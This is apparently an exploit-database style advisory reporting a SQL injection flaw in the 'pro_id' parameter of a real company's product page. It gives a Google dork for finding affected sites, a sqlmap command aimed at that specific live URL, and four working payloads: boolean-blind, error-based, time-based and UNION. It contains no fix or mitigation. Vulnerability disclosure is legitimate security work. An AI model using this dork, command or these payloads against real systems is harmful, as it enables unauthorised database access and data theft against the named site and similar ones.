*********************************************************
#Exploit Title:Futronic Technology Company Limited. - Sql Injection Vulnerability
#Date: 2022-02-26
#Exploit Author: Jayson San Buenaventura
#Google Dork: "Futronic Technology Company Limited."
#Category:webapps
#Tested On: Kali Linux, CyberFox
Proof of Concept:
Search google Dork: "Futronic Technology Company Limited."
### Demo :
sqlmap -u 'https://www.futronic-tech.com/pro-detail.php?pro_id=1543' --dbs --random-agent
Parameter: pro_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pro_id=1543 AND 5828=5828
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: pro_id=1543 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707871,(SELECT (ELT(6573=6573,1))),0x716b6b7671,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pro_id=1543 AND (SELECT 8647 FROM (SELECT(SLEEP(5)))tjaj)
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: pro_id=1543 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707871,0x6164696478734969614d77504a4e4f726a4d4c4c4e50746a50746c514d6f456758546844766f644a,0x716b6b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
*********************************************************
#Discovered by: Jayson San Buenaventura
#Facebook: Jayson Cabrillas San Buenaventura
#Email: sanbuenaventurajayson27@gmail.com
*********************************************************